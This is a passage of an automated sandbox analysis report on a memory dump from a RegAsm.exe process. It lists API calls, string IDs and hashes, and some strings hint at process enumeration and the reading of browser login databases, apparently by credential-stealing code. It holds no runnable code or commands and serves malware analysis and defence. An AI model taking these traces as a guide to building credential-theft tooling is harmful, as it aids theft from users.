                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 59245283-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                • String ID: 3A
                                                                                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                • String ID: strings
                                                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoadMessage
                                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                • API String ID: 3897320386-317687271
                                                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                • API String ID: 4271163124-70141382
                                                                                                                                                                                • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                • API String ID: 4139908857-3953557276
                                                                                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404363: RtlAllocateHeap.NTDLL(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateFreeHeapLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                • String ID: 6$\
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfwcscpy
